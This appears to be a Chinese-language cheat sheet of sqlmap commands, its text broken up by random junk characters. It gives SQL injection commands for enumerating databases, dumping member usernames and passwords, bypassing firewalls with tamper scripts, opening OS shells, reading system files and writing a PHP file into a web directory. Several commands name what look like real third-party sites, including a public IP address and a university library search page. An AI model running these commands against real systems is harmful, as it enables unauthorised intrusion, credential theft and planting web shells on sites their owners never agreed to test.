sqlmap使用实例

admin

/pentest/database/sqlmap

update :::::>     in the folder   after  execute    following   order : svn update
0 p, C2 K% d1 ?' [# Q' f) x, \
sqlmap.py -r 1.txt --current-db
  E! a; r# g7 L
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

# C. k3 E9 }) t" p3 m( {% I* m==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
猜解数据库
./sqlmap.py -u "injection-url" --dbs
! m/ ~! c8 L8 Q1 t' tsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
6 W. ^" r/ H$ ~7 L) j$ {* T
猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables

sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
% Q" u% b3 O! S/ M* F% P
5 s. ]4 s" C% c& F$ |' r8 _, Gsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
0 a/ o/ g9 r, T5 asqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
) N$ ]% q+ u, I7 h- H, o5 ]2 Bsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
" Z- q5 R' H( z$ s" L& m! C; ~; l# |
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
9 ^/ [7 t/ M/ O5 D, K" F$ {" d1 c& Ssqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
1 E& d! b$ H' o6 K4 Q1 U
& W# ?2 u' |2 G7 esqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
) H7 x# H- Y  x0 v& ?/ asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

( {2 j- _4 a4 m. p  o5 k$ X# asqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
8 P5 b/ E$ i4 m& k+ w! S$ k  H0 M猜解列名
! n. o& f% T  d3 \./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
1 p6 E2 d6 `% g5 U, s
! Q6 Y/ R4 j0 x) @, D# usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
* R$ J4 M+ q7 P% v" ]2 N. Qsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
! g% C1 I! q5 l' U8 S$ [0 Xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
/ _  L7 e  b& u! N2 ?&submit=Go
猜解值
, k8 |& r" G; k: y$ |% y./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
- G+ L8 R0 d, w6 }) k- A搜索表名中包括mana字符的
8 W% b! L  ~9 M+ c* e& J' d/sqlmap.py -u "injection-url" -T mana --search
# l! Z' y) s8 ?# O返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
( Q6 e( Q" }1 s7 }* k读取指定文件（需权限）
) i  U% q; {  I& p1 {! L- E  f/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
查看当前 用户 及 数据库
2 g. b! B7 w0 f' m/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
5 c0 G0 F) c7 Y  @: ]/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
8 p+ Q2 g# R8 v. Z5 {
% i$ Z; C( @4 u0 ]3 |9 \sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
) ]+ S) a% T3 J/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
' r4 Q" ]# H5 g+ O+ X- ?4 L* S7 [6 {读取所有数据库用户或指定数据库用户的密码
7 d8 N+ T; Q& H  b# r; {5 Q' o. Tsqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
& f, A% }2 i; f4 V6 j' d
/sqlmap.py -u "injection-url" --passwords -U root
* o1 D( ~5 K1 P4 J0 b$ X
--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

) x; ]( Y  o+ V从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
) w5 k- t) q4 O% H" J( o# G& }/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
4 j2 N& ]6 ~% q- O* E' e% e/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
7 v$ \3 S1 [" G7 n